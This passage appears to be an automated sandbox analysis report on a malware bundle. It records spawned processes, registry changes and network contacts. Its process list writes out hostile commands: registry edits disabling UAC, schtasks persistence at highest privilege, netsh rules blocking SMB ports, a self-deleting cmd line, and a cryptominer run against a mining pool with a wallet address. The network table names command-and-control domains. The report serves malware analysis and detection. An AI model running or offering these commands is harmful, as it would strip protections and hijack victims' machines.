3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240629765.txt",MainThread
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\schtasks.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\Resources\Ease of Access Themes\schtasks.exe
"C:\Windows\Resources\Ease of Access Themes\schtasks.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 1340
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1372 -ip 1372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 448
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9757c46f8,0x7ff9757c4708,0x7ff9757c4718
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8
C:\Users\Admin\Downloads\HitmanPro_x64.exe
"C:\Users\Admin\Downloads\HitmanPro_x64.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3780 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2344 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| US | 104.155.138.21:81 | yabynennet.xyz | tcp |
| US | 8.8.8.8:53 | 79.222.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.138.155.104.in-addr.arpa | udp |
| CN | 59.56.110.231:8898 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| RU | 92.63.107.12:80 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| RU | 92.63.107.12:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| MD | 194.180.174.53:80 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | prepepe.ac.ug | udp |
